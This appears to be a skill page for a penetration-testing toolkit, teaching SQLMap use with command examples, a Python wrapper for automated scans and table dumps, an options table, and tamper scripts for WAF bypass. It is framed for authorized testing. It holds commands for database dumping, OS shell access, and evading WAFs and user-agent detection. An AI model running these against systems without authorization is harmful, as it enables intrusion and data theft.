Sqlmap Database Smart

Automate SQL injection detection and exploitation using SQLMap, the industry-standard open-source penetration testing tool. This skill covers SQLMap command syntax, tamper scripts, data extraction, OS-level access, WAF bypass, and integration with Burp Suite for authenticated testing.

When to Use This Skill

Choose Sqlmap Database Smart when you need to:

• Automatically detect and exploit SQL injection vulnerabilities
• Extract database schemas, tables, and data from vulnerable applications
• Test multiple injection techniques simultaneously (UNION, blind, error, stacked)
• Bypass WAF protections with tamper scripts during authorized testing

Consider alternatives when:

• You need to understand SQL injection fundamentals (use Comprehensive SQL Module)
• You need manual, targeted injection testing (use manual techniques)
• You need to test NoSQL injection (use NoSQL-specific tools)

Quick Start

Copy
# Basic detection
sqlmap -u "https://target.com/page?id=1" --batch

# POST request with specific parameter
sqlmap -u "https://target.com/login" --data="username=admin&password=test" -p username --batch

# With authentication cookie
sqlmap -u "https://target.com/api/users?id=1" --cookie="session=abc123" --batch

# From Burp Suite saved request
sqlmap -r request.txt --batch

Copy
# Python wrapper for SQLMap automation
import subprocess
import json
import os

class SQLMapWrapper:
    """Automate SQLMap scanning in penetration tests."""

    def __init__(self, sqlmap_path='sqlmap'):
        self.sqlmap_path = sqlmap_path

    def scan(self, url, params=None, method='GET', cookie=None,
             level=1, risk=1, technique='BEUSTQ', tamper=None,
             output_dir='/tmp/sqlmap_output'):
        """Run SQLMap scan with specified options."""
        cmd = [
            self.sqlmap_path,
            '-u', url,
            '--batch',           # Non-interactive
            '--level', str(level),
            '--risk', str(risk),
            '--technique', technique,
            '--output-dir', output_dir,
            '--flush-session',
        ]

        if params:
            cmd.extend(['-p', params])
        if cookie:
            cmd.extend(['--cookie', cookie])
        if tamper:
            cmd.extend(['--tamper', tamper])
        if method == 'POST':
            cmd.extend(['--method', 'POST'])

        print(f"Running: {' '.join(cmd)}")
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
        return {
            'stdout': result.stdout,
            'stderr': result.stderr,
            'returncode': result.returncode,
        }

    def enumerate_dbs(self, url, **kwargs):
        """Enumerate databases on a confirmed vulnerable target."""
        kwargs['url'] = url
        cmd = [self.sqlmap_path, '-u', url, '--batch', '--dbs']
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
        return result.stdout

    def dump_table(self, url, db, table, **kwargs):
        """Dump a specific table from a confirmed vulnerable target."""
        cmd = [
            self.sqlmap_path, '-u', url, '--batch',
            '-D', db, '-T', table, '--dump',
        ]
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
        return result.stdout

# scanner = SQLMapWrapper()
# result = scanner.scan("https://target.com/search?q=test", params="q")

Core Concepts

SQLMap Options Reference

Option	Description	Example
-u URL	Target URL with parameter	-u "http://target/page?id=1"
-r FILE	Load HTTP request from file	-r burp_request.txt
--data	POST data	--data="user=admin&pass=test"
-p PARAM	Testable parameter(s)	-p "id,name"
--cookie	HTTP Cookie header	--cookie="sess=abc"
--level	Tests to perform (1-5)	--level 3
--risk	Risk of test payloads (1-3)	--risk 2
--technique	SQL injection techniques	--technique BEUST
--tamper	Tamper scripts for WAF bypass	--tamper=space2comment
--dbs	Enumerate databases	--dbs
--tables	Enumerate tables	-D dbname --tables
--dump	Dump table data	-D db -T table --dump
--os-shell	OS command shell (if possible)	--os-shell
--batch	Non-interactive mode	--batch

Common Tamper Scripts for WAF Bypass

Copy
# Space bypass (replace spaces)
sqlmap -u URL --tamper=space2comment
sqlmap -u URL --tamper=space2plus
sqlmap -u URL --tamper=space2randomblank

# Case manipulation
sqlmap -u URL --tamper=randomcase
sqlmap -u URL --tamper=uppercase

# Encoding bypass
sqlmap -u URL --tamper=charencode
sqlmap -u URL --tamper=chardoubleencode
sqlmap -u URL --tamper=base64encode

# Comment injection
sqlmap -u URL --tamper=between
sqlmap -u URL --tamper=equaltolike

# Multiple tampers
sqlmap -u URL --tamper=space2comment,randomcase,charencode

# Common WAF-specific combinations
# ModSecurity:
sqlmap -u URL --tamper=modsecurityversioned
# MySQL specific:
sqlmap -u URL --tamper=space2comment,between,randomcase
# MSSQL specific:
sqlmap -u URL --tamper=space2mssqlblank,uppercase

Configuration

Parameter	Description	Default
level	Test thoroughness (1-5; higher = more tests)	1
risk	Payload risk level (1-3; higher = more dangerous)	1
technique	B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline	"BEUSTQ"
threads	Concurrent requests	1
timeout	Request timeout (seconds)	30
retries	Retry count for failed requests	3
delay	Delay between requests (seconds)	0
tamper	WAF bypass tamper scripts	None

Best Practices

1. Start with --level 1 --risk 1 and increase only if needed — Higher levels send more payloads and take longer. Level 1 catches most common SQL injections. Increase to --level 3 for testing cookies and HTTP headers, and --risk 2 for more aggressive payloads that might cause data modifications.

2. Use -r request.txt with Burp Suite for complex requests — For authenticated endpoints, POST requests with JSON bodies, or requests with custom headers, save the request from Burp and load it with -r. This captures all headers, cookies, and body formatting accurately.

3. Specify the DBMS type when known for faster detection — If you know the target uses MySQL, add --dbms=mysql. This skips payloads for other database types, making the scan 5-10x faster. Wrong DBMS specification causes false negatives — use only when confident.

4. Always use --batch for automated scripts — Without --batch, SQLMap prompts for user input at multiple decision points. In automated pipelines, this causes the scan to hang indefinitely. --batch uses default answers for all prompts.

5. Save and review all SQLMap output — Use --output-dir to save scan results. SQLMap creates log files with every request/response, which serves as evidence for the penetration test report. Review the session file to understand exactly what was tested.

Common Issues

SQLMap reports "all tested parameters do not appear to be injectable" — The parameter may genuinely not be vulnerable, or SQLMap needs more aggressive testing. Try: --level 5 --risk 3 for maximum coverage, add --tamper scripts if a WAF is present, or test with a known injectable parameter first to verify SQLMap is working correctly.

SQLMap is extremely slow on blind injection — Blind injection extracts data one character at a time via binary search. For large databases, this takes hours. Use --threads 5 to parallelize (check for session-based issues first), or extract only specific data with -D db -T table -C column --dump.

WAF blocks SQLMap's user agent — SQLMap's default User-Agent identifies itself as SQLMap. Use --random-agent to rotate through common browser user agents, or set a specific one with -A "Mozilla/5.0...". Also add --delay 1 to avoid rate-based WAF triggers.